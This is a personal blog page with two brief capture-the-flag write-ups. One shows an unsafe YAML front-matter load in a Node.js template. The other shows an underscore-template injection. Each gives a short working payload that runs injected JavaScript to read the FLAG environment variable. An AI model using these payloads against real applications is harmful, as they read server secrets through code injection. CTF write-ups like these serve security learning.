Mehran's Boring Blog

daily so-called-technical experiences

Mehran's Boring Blog

daily so-called-technical experiences

I found myself publishing things, which may or may not be taken seriously.

Subject Categories

Latest Comments

Recent Posts

۲ مطلب با کلمه‌ی کلیدی «injection» ثبت شده است

Here's the app's code.

Pretty much like the web100-2 task, we should inject js code into the template, such that it has access to js global context.
That's not hard, just RTFM, and you'll see how load is considered unsafe, and should NOT be used to load untrusted data sources. Let's exploit it:

---
flag: !!js/function >
  function flag() {
    return process.env.FLAG;
  }
---
{{ flag }}

and take your flag away.
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:37
Mehran
Here's the app's code.
So, the underscore template is provided by the user. It's easy to execute arbitrary js code in the same context normal js code is run.
<%
print(process.env.FLAG);
%>

That's all.
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:29
Mehran